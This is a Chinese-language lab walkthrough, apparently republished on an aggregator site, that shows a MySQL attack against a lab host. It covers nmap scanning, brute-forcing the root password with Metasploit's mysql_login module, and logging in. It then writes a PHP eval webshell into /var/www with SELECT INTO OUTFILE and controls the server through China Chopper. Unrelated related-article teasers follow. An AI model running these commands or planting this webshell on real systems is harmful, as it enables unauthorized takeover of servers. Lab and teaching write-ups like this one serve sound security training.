利用MySQL暴力破解实现远程控制

这篇具有很好参考价值的文章主要介绍了利用MySQL暴力破解实现远程控制。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

一、信息收集

利用nmap工具扫描靶机3306端口开启情况

nmap -sV 192.168.180.133 -p 3306
mysql 漏洞利用工具,学习,安全,网络,Powered by 金山文档

发现靶机开启3306端口,MySQL数据库

二、渗透测试

打开msfconsole渗透测试平台

mysql 漏洞利用工具,学习,安全,网络,Powered by 金山文档

搜索mysql_login漏洞模块

search mysql_login
mysql 漏洞利用工具,学习,安全,网络,Powered by 金山文档

使用auxiliary/scanner/mysql/mysql_login漏洞攻击模块

use 0
mysql 漏洞利用工具,学习,安全,网络,Powered by 金山文档

查看需要配置的参数

show options
mysql 漏洞利用工具,学习,安全,网络,Powered by 金山文档

设置密码字典

set pass_file /pass.txt
mysql 漏洞利用工具,学习,安全,网络,Powered by 金山文档

设置目标IP

set rhosts 192.168.180.133
mysql 漏洞利用工具,学习,安全,网络,Powered by 金山文档

设置爆破用户名

set username root
mysql 漏洞利用工具,学习,安全,网络,Powered by 金山文档

运行

exploit
mysql 漏洞利用工具,学习,安全,网络,Powered by 金山文档

成功爆破出密码 P@sswrd

三、远程登录

使用我们爆破出的用户名密码远程登录MySQL数据库

mysql -h 192.168.180.133 -u root -p
mysql 漏洞利用工具,学习,安全,网络,Powered by 金山文档

登录成功后写入一句话木马到/var/www目录中

select '<?php @eval($_POST[pass]);?>' into outfile '/var/www/shell.php';
mysql 漏洞利用工具,学习,安全,网络,Powered by 金山文档

写入成功后使用中国菜刀连接

mysql 漏洞利用工具,学习,安全,网络,Powered by 金山文档

双击进入

mysql 漏洞利用工具,学习,安全,网络,Powered by 金山文档

连接成功,可看到系统文件及信息

右击也可以打开虚拟终端,执行命令

mysql 漏洞利用工具,学习,安全,网络,Powered by 金山文档
mysql 漏洞利用工具,学习,安全,网络,Powered by 金山文档

实验结束文章来源地址https://www.toymoban.com/news/detail-728238.html

到了这里,关于利用MySQL暴力破解实现远程控制的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 如何在局域网中进行远程桌面登入实现远程控制电脑

    要远程控制本地桌面电脑,就必须要获得本地电脑权限。所有的远程控制软件都是一个原理哦,只是有些远程控制软件把获得权限的设置伪装成一个木马而已,当你点击后就证明你允许它远程控制电脑,受理他所有的权限,那么他就可以为所欲为了。其实正规的获取本地电脑

    2024年02月06日
    浏览(46)
  • 分分钟穿透手机,实现远程控制

    大家好,我是鸟哥。一个半路出家的程序员。 之前给大家分过一篇文章——一行命令就把女友们的手机彻底监控了~我可以为所欲为了...,教大家使用Scrcpy实现电脑对手机的无线监控(更确切的说应该是投屏),但是受限于只能在局域网下使用,这就非常鸡肋了。不过在文末

    2024年02月04日
    浏览(49)
  • 微信小程序实现远程控制门锁

    微信小程序实现远程控制门锁呢? 本文描述了使用微信小程序调用HTTP接口,实现控制门锁。通过智能出门开关,配合普通的电插锁、电磁锁,来实现门禁控制。 可选用产品:可根据实际场景需求,选择对应的规格 序号 设备名称 1 智能WiFi墙壁出门开关 2 智能WiFi触摸墙壁出门

    2024年04月23日
    浏览(58)
  • 利用暴力攻击破解登陆密码

    长久以来,入侵远程计算机系统的工具和技术并没有发生翻天覆地的变化。例如,在许多情况下,普通用户只要知道了相关密码,就能立刻变身为管理员。虽然这些情形听起来不够曲折,但在大多数情况下,暴力攻击是通过利用密码管理缺陷来入侵系统的最简单实用的方法。

    2024年02月05日
    浏览(38)
  • 怎样用PHP语言实现远程控制三路开关

    怎样用PHP语言实现远程控制三路开关呢? 本文描述了使用PHP语言调用HTTP接口,实现控制三路开关,三路开关可控制三路照明、排风扇等电器。 可选用产品:可根据实际场景需求,选择对应的规格 序号 设备名称 厂商 1 智能WiFi墙壁开关3路 统软云物联 2 智能WiFi触摸墙壁开关

    2024年04月24日
    浏览(79)
  • STM32+ESP8266实现远程控制LED

    上次学会了串口调试助手配置ESP8266之后,尝试用STM32的串口来配置ESP8266,参考了以下几篇文章 文章1,点击跳转 文章2,点击跳转 ESP8266 STM32 3V3 3.3 GND GND RX PB10 TX PB11 然后STM32f103C8T6核心板自带了一个LED接的是PB13引脚。 这里值得一提的是,刚开始我把ESP8266的3V3引脚接到了USB转

    2023年04月26日
    浏览(107)
  • thingsboard+ESP8266+MQTT实现设备远程控制

    本次主要想实现功能:thingsboard平台远程控制设备 设备(ESP8266上的灯作为一台设备,模拟控制灯的开关) 指令传输通过thingsboard平台集成的MQTT协议 利用thingsboard仪表盘库的一个控制组件模拟发送指令来控制我们的 灯的开关 之前搭建好的thingsboard平台 NodeMCU开发板 开发NodeMC

    2023年04月19日
    浏览(69)
  • Android MQTT:实现设备信息上报与远程控制

    1.1 MQTT是什么? MQTT(Message Queuing Telemetry Transport)是一种轻量级的消息传输协议,最初由IBM开发,用于连接远程设备与服务器之间的通信。它在物联网(IoT)应用中变得越来越流行,因为它具有以下特点: 轻量级协议 :MQTT是一种精简的协议,有效地减少了通信开销,适合于

    2024年02月09日
    浏览(41)
  • 如何通过VNC实现公网远程控制macOS设备

    macOS系统自带有VNC远程桌面,我们可以在控制端上安装配置VNC客户端,以此来实现远程控制macOS。但通常需要在不同网络下进行远程控制,为此,我们可以在macOS被控端上使用cpolar做内网穿透,映射VNC默认端口5900,通过所生成的公网地址,来实现在公网环境下远程控制VNC。 1

    2024年02月08日
    浏览(48)
  • win10远程桌面控制Ubuntu服务器 - 内网穿透实现公网远程

    转载自远程穿透文章:Windows通过RDP异地远程桌面Ubuntu【内网穿透】 XRDP是一种开源工具,它允许用户通过Windows RDP访问Linux远程桌面。 除了Windows RDP外,xrdp工具还接受来自其他RDP客户端(如FreeRDP、rdesktop和NeutrinoRDP )的连接。 相较于VNC,xrdp更加的轻量级。下面简单几步实现ubu

    2024年02月03日
    浏览(49)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包